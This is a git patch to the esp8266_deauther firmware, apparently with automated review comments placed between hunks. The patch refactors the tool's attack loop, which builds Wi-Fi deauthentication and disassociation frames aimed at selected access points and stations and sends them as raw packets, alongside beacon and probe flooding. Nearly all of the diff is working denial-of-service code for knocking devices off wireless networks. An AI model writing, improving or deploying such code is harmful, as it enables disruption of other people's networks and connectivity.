From e494d95c15e689edd8eff140015c2fd53191d3fd Mon Sep 17 00:00:00 2001
From: Stefan Kremser
Date: Sun, 25 Mar 2018 10:26:55 +0200
Subject: [PATCH] Improved attack routine
- less count() calls
- fixed the deauth station crash (hopefully)
- sort targets after channel for better performance
- increment counter in deauth/beacon/probe function and not in sendPacket() that was stupid anyway
---
esp8266_deauther/Attack.cpp | 91 +++++++++++++++++-----------
esp8266_deauther/Attack.h | 18 +++---
esp8266_deauther/SerialInterface.cpp | 8 ++-
esp8266_deauther/Stations.cpp | 8 +++
esp8266_deauther/Stations.h | 1 +
5 files changed, 82 insertions(+), 44 deletions(-)
diff --git a/esp8266_deauther/Attack.cpp b/esp8266_deauther/Attack.cpp
index 75baf97..33160de 100644
--- a/esp8266_deauther/Attack.cpp
+++ b/esp8266_deauther/Attack.cpp
@@ -23,7 +23,8 @@ void Attack::start() {
 prntln(A_START);
 attackTime = currentTime;
 attackStartTime = currentTime;
- //accesspoints.sortAfterChannel();
+ accesspoints.sortAfterChannel();
+ stations.sortAfterChannel();
 running = true;
 }
@@ -41,6 +42,8 @@ void Attack::start(bool beacon, bool deauth, bool deauthAll, bool probe, bool ou
 start();
 } else {
 prntln(A_NO_MODE_ERROR);
+ accesspoints.sort();
+ stations.sort();
 stop();
 }
 }
@@ -131,6 +134,10 @@ String Attack::getStatusJSON() {
 void Attack::update() {
 if (!running || scan.isScanning()) return;
+ apCount = accesspoints.count();
+ stCount = stations.count();
+ nCount = names.count();
+
 // run/update all attacks
 deauthUpdate();
 deauthAllUpdate();
@@ -150,28 +157,28 @@ void Attack::deauthUpdate() {
 if (!deauthAll && deauth.active && deauth.maxPkts > 0 && deauth.packetCounter < deauth.maxPkts) {
 if (deauth.time <= currentTime - (1000 / deauth.maxPkts)) {
 // APs
- if (accesspoints.count() > 0 && deauth.tc < accesspoints.count()) {
+ if (apCount > 0 && deauth.tc < apCount) {
 if (accesspoints.getSelected(deauth.tc)) {
 deauth.tc += deauthAP(deauth.tc);
 } else deauth.tc++;
 }
 // Stations
- else if (stations.count() > 0 && deauth.tc >= accesspoints.count() && deauth.tc < stations.count() + accesspoints.count()) {
- if (stations.getSelected(deauth.tc - accesspoints.count())) {
- deauth.tc += deauthStation(deauth.tc - accesspoints.count());
+ else if (stCount > 0 && deauth.tc >= apCount && deauth.tc < stCount + apCount) {
+ if (stations.getSelected(deauth.tc - apCount)) {
+ deauth.tc += deauthStation(deauth.tc - apCount);
 } else deauth.tc++;
 }
 // Names
- else if (names.count() > 0 && deauth.tc >= accesspoints.count() + stations.count() && deauth.tc < names.count() + stations.count() + accesspoints.count()) {
- if (names.getSelected(deauth.tc - stations.count() - accesspoints.count())) {
- deauth.tc += deauthName(deauth.tc - stations.count() - accesspoints.count());
+ else if (nCount > 0 && deauth.tc >= apCount + stCount && deauth.tc < nCount + stCount + apCount) {
+ if (names.getSelected(deauth.tc - stCount - apCount)) {
+ deauth.tc += deauthName(deauth.tc - stCount - apCount);
 } else deauth.tc++;
 }
 // reset counter
- if (deauth.tc >= names.count() + stations.count() + accesspoints.count())
+ if (deauth.tc >= nCount + stCount + apCount)
 deauth.tc = 0;
 }
 }
@@ -181,7 +188,7 @@ void Attack::deauthAllUpdate() {
 if (deauthAll && deauth.active && deauth.maxPkts > 0 && deauth.packetCounter < deauth.maxPkts) {
 if (deauth.time <= currentTime - (1000 / deauth.maxPkts)) {
 // APs
- if (accesspoints.count() > 0 && deauth.tc < accesspoints.count()) {
+ if (apCount > 0 && deauth.tc < apCount) {
 tmpID = names.findID(accesspoints.getMac(deauth.tc));
 if (tmpID < 0) {
 deauth.tc += deauthAP(deauth.tc);
@@ -191,24 +198,24 @@ void Attack::deauthAllUpdate() {
 }
 // Stations
- else if (stations.count() > 0 && deauth.tc >= accesspoints.count() && deauth.tc < stations.count() + accesspoints.count()) {
- tmpID = names.findID(stations.getMac(deauth.tc - accesspoints.count()));
+ else if (stCount > 0 && deauth.tc >= apCount && deauth.tc < stCount + apCount) {
+ tmpID = names.findID(stations.getMac(deauth.tc - apCount));
 if (tmpID < 0) {
- deauth.tc += deauthStation(deauth.tc - accesspoints.count());
+ deauth.tc += deauthStation(deauth.tc - apCount);
 } else if (!names.getSelected(tmpID)) {
- deauth.tc += deauthStation(deauth.tc - accesspoints.count());
+ deauth.tc += deauthStation(deauth.tc - apCount);
 } else deauth.tc++;
 }
 // Names
- else if (names.count() > 0 && deauth.tc >= accesspoints.count() + stations.count() && deauth.tc < accesspoints.count() + stations.count() + names.count()) {
- if (!names.getSelected(deauth.tc - accesspoints.count() - stations.count())) {
- deauth.tc += deauthName(deauth.tc - accesspoints.count() - stations.count());
+ else if (nCount > 0 && deauth.tc >= apCount + stCount && deauth.tc < apCount + stCount + nCount) {
+ if (!names.getSelected(deauth.tc - apCount - stCount)) {
+ deauth.tc += deauthName(deauth.tc - apCount - stCount);
 } else deauth.tc++;
 }
 // reset counter
- if (deauth.tc >= names.count() + stations.count() + accesspoints.count())
+ if (deauth.tc >= nCount + stCount + apCount)
 deauth.tc = 0;
 }
 }
@@ -233,15 +240,15 @@ void Attack:: beaconUpdate() {
 }
 }
-bool Attack::deauthStation(uint8_t num) {
+bool Attack::deauthStation(int num) {
 return deauthDevice(accesspoints.getMac(stations.getAP(num)), stations.getMac(num), settings.getDeauthReason(), accesspoints.getCh(stations.getAP(num)));
 }
-bool Attack::deauthAP(uint8_t num) {
+bool Attack::deauthAP(int num) {
 return deauthDevice(accesspoints.getMac(num), broadcast, settings.getDeauthReason(), accesspoints.getCh(num));
 }
-bool Attack::deauthName(uint8_t num) {
+bool Attack::deauthName(int num) {
 if (names.isStation(num)) {
 return deauthDevice(names.getBssid(num), names.getMac(num), settings.getDeauthReason(), names.getCh(num));
 } else {
@@ -253,7 +260,7 @@ bool Attack::deauthDevice(uint8_t* apMac, uint8_t* stMac, uint8_t reason, uint8_
 if (!stMac) return false; // exit when station mac is null
 //Serial.println("Deauthing "+macToStr(apMac)+" -> "+macToStr(stMac)); // for debugging
-
+
 bool success = false;
 // build deauth packet
@@ -265,22 +272,36 @@ bool Attack::deauthDevice(uint8_t* apMac, uint8_t* stMac, uint8_t reason, uint8_
 // send deauth frame
 deauthPacket[0] = 0xc0;
- if (sendPacket(deauthPacket, packetSize, &deauth.packetCounter, ch, settings.getForcePackets()))
+ if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets()))
 success = true;
 // send disassociate frame
 deauthPacket[0] = 0xa0;
- if (sendPacket(deauthPacket, packetSize, &deauth.packetCounter, ch, settings.getForcePackets()))
+ if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets()))
 success = true;
-
+
 // send another packet, this time from the station to the accesspoint
 if (!macBroadcast(stMac)) { // but only if the packet isn't a broadcast
- if (deauthDevice(stMac, apMac, reason, ch)) {
+ // build deauth packet
+ memcpy(&deauthPacket[4], apMac, 6);
+ memcpy(&deauthPacket[10], stMac, 6);
+ memcpy(&deauthPacket[16], stMac, 6);
+
+ // send deauth frame
+ deauthPacket[0] = 0xc0;
+ if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets()))
+ success = true;
+
+ // send disassociate frame
+ deauthPacket[0] = 0xa0;
+ if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets()))
 success = true;
- }
 }
- if (success) deauth.time = currentTime;
+ if (success){
+ deauth.time = currentTime;
+ deauth.packetCounter++;
+ }
 return success;
 }
@@ -310,8 +331,9 @@ bool Attack::sendBeacon(uint8_t* mac, const char* ssid, uint8_t ch, bool wpa2) {
 beaconPacket[82] = ch;
- if (sendPacket(beaconPacket, packetSize, &beacon.packetCounter, ch, settings.getForcePackets())) {
+ if (sendPacket(beaconPacket, packetSize, ch, settings.getForcePackets())) {
 beacon.time = currentTime;
+ beacon.packetCounter++;
 return true;
 }
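Review bot: The new body of the `if (!macBroadcast(stMac))` branch duplicates the sequence that precedes it in the same function — three `memcpy` calls, then the `0xc0` and `0xa0` sends guarded by `sendPacket` — so `deauthDevice` now carries two copies of identical logic that will drift apart; factor it into one private helper taking the two addresses and call it twice. The recursive `deauthDevice(stMac, apMac, reason, ch)` it replaces would, after this commit, presumably have incremented `deauth.packetCounter` and reset `deauth.time` a second time, which I assume is why it was inlined; a one-line comment such as `// inlined on purpose: a recursive call would count and timestamp twice` would keep the next reader from reintroducing the recursion. The function's opening lines, including the first packet build, lie outside the hunk.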
@@ -332,30 +354,29 @@ bool Attack::sendProbe(uint8_t* mac, const char* ssid, uint8_t ch) {
 memcpy(&probePacket[10], mac, 6);
 memcpy(&probePacket[26], ssid, ssidLen);
- if (sendPacket(probePacket, packetSize, &probe.packetCounter, ch, settings.getForcePackets())) {
+ if (sendPacket(probePacket, packetSize, ch, settings.getForcePackets())) {
 probe.time = currentTime;
+ probe.packetCounter++;
 return true;
 }
 return false;
 }
-bool Attack::sendPacket(uint8_t* packet, uint16_t packetSize, uint16_t* packetCounter, uint8_t ch, uint16_t tries) {
+bool Attack::sendPacket(uint8_t* packet, uint16_t packetSize, uint8_t ch, uint16_t tries) {
 //Serial.println(bytesToStr(packet, packetSize));
 // set channel
 setWifiChannel(ch);
-
+
 // sent out packet
 bool sent = wifi_send_pkt_freedom(packet, packetSize, 0) == 0;
-
+
 // try again until it's sent out
 for (int i = 0; i < tries && !sent; i++) {
- yield();
 sent = wifi_send_pkt_freedom(packet, packetSize, 0) == 0;
 }
- if (sent) (*packetCounter)++;
 return sent;
 }
diff --git a/esp8266_deauther/Attack.h b/esp8266_deauther/Attack.h
index 8700bcc..32cbe2e 100644
--- a/esp8266_deauther/Attack.h
+++ b/esp8266_deauther/Attack.h
@@ -42,9 +42,9 @@ class Attack {
 void status();
 String getStatusJSON();
- bool deauthAP(uint8_t num);
- bool deauthStation(uint8_t num);
- bool deauthName(uint8_t num);
+ bool deauthAP(int num);
+ bool deauthStation(int num);
+ bool deauthName(int num);
 bool deauthDevice(uint8_t* apMac, uint8_t* stMac, uint8_t reason, uint8_t ch);
 bool sendBeacon(uint8_t tc);
@@ -53,7 +53,7 @@ class Attack {
 bool sendProbe(uint8_t tc);
 bool sendProbe(uint8_t* mac, const char* ssid, uint8_t ch);
- bool sendPacket(uint8_t* packet, uint16_t packetSize, uint16_t* packetCounter, uint8_t ch, uint16_t tries);
+ bool sendPacket(uint8_t* packet, uint16_t packetSize, uint8_t ch, uint16_t tries);
 bool isRunning();
@@ -90,13 +90,17 @@ class Attack {
 uint32_t deauthPkts = 0;
 uint32_t beaconPkts = 0;
 uint32_t probePkts = 0;
-
- int8_t tmpID;
+
+ uint8_t apCount = 0;
+ uint8_t stCount = 0;
+ uint8_t nCount = 0;
+
+ int8_t tmpID = -1;
 uint16_t packetSize = 0;
 uint32_t attackTime = 0; // for counting how many packets per second
 uint32_t attackStartTime = 0;
- uint32_t timeout;
+ uint32_t timeout = 0;
 // random mac address for making the beacon packets
 uint8_t mac[6] = {0xAA,0xBB,0xCC,0x00,0x11,0x22};
diff --git a/esp8266_deauther/SerialInterface.cpp b/esp8266_deauther/SerialInterface.cpp
index 916980b..077a94b 100644
--- a/esp8266_deauther/SerialInterface.cpp
+++ b/esp8266_deauther/SerialInterface.cpp
@@ -889,8 +889,12 @@ void SerialInterface::runCommand(String input) {
 for (int i = 0; i < packetSize; i++) packet[i] = strtoul((packetStr.substring(i * 2, i * 2 + 2)).c_str(), NULL, 16);
- if (attack.sendPacket(packet, packetSize, &counter, wifi_channel, 10)) prntln(CLI_CUSTOM_SENT);
- else prntln(CLI_CUSTOM_FAILED);
+ if (attack.sendPacket(packet, packetSize, wifi_channel, 10)){
+ prntln(CLI_CUSTOM_SENT);
+ counter++;
+ } else{
+ prntln(CLI_CUSTOM_FAILED);
+ }
 }
 // ===== LED ===== //
diff --git a/esp8266_deauther/Stations.cpp b/esp8266_deauther/Stations.cpp
index ec1ecd9..56c4f11 100644
--- a/esp8266_deauther/Stations.cpp
+++ b/esp8266_deauther/Stations.cpp
@@ -35,6 +35,14 @@ void Stations::sort() {
 });
 }
+void Stations::sortAfterChannel() {
+ list->sort([](Station & a, Station & b) -> int{
+ if (a.ch == b.ch) return 0;
+ if (a.ch < b.ch) return -1;
+ if (a.ch > b.ch) return 1;
+ });
+}
+
 void Stations::removeAll() {
 internal_removeAll();
 prntln(ST_CLEARED_LIST);
diff --git a/esp8266_deauther/Stations.h b/esp8266_deauther/Stations.h
index 89f445f..0a5d96b 100644
--- a/esp8266_deauther/Stations.h
+++ b/esp8266_deauther/Stations.h
@@ -27,6 +27,7 @@ class Stations {
 Stations();
 void sort();
+ void sortAfterChannel();
 void select(int num);
 void deselect(int num);
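Review bot: The comparator lambda in `Stations::sortAfterChannel` has no return on its fall-through path: it is declared `-> int`, but each `return` sits behind an `if`, so the compiler sees a path that ends without a value (a `-Wreturn-type` warning, and undefined behaviour if that path is ever taken). Because `a.ch == b.ch` and `a.ch < b.ch` are already handled, the third test is redundant; replace `if (a.ch > b.ch) return 1;` with a plain `return 1;` so every path yields a value. A one-line comment above the lambda, `// three-way compare on channel: 0 equal, -1 a first, 1 b first`, would also document the contract `list->sort` appears to expect from the return value.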